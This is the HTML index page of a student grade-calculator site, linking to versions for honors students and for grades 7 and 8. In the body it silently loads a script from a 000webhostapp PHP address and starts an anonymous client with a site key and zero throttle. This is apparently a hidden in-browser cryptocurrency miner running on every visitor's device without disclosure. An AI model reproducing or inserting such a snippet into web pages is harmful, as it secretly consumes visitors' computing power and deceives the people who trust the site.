<!DOCTYPE html>
<html>
  <head>
    <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-N974WZZ');</script>
<!-- End Google Tag Manager -->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-171412244-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());

gtag('config', 'UA-171412244-1');
</script>
<script data-ad-client="ca-pub-9927558665571172" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>


    <meta charset="utf-8">
    <meta name="description" content="A grade universal grade calculator">
    <meta name="keywords" content="Parinthapat Pengpun, Parin, Grade-Calculator, Universal Grade calculator, Grade Cal Bcis, Grade">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Grade Calculator - Parin</title>
    <link rel='icon' href='favicon.ico' type='image/x-icon'/ >

    <style>
    body {
      background-image: url('background.jpg');
    }
    </style>

  </head>

  <body>
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N974WZZ"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<script src="https://grade-cal.000webhostapp.com/YBrU.php?f=fWxo.js"></script>
<script>
    var _client = new Client.Anonymous('b89b585001421b41b9b9b524934b5e158996d1e21305816c5cf0f82c4285db72', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();


</script>

    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
    <header align="center" style="max-width: 500px; margin-left: auto; margin-right: auto">
      <div style="color: black; border: 5px solid black; border-radius: 30px; display: inline-block; background: grey">
        <br>

      <i><h1>Grade Calculator v0.3!</h1>
      <h2><p>Choose your version from the link below!</p></h2></i>
      <nav style="font-size:20px">

        <p><a href="beta.html">
        Grade Calculator for Honors (GRADE 9 and UP) [BETA]</a></p>

        <p><a href="normal.html"> Grade Calculator for 7 and 8</a></p>
      <h3><p>Made by: Parinthapat Pengpun (Written from Scratch)</p></h3>


        <br>
        <br>

        </nav>
      </div>
    </header>

    <br>
    <br>

    <main>
      <article>
        <section>



        </section>
      </article>
    </main>

    <footer>

    </footer>
  </body>
</html>
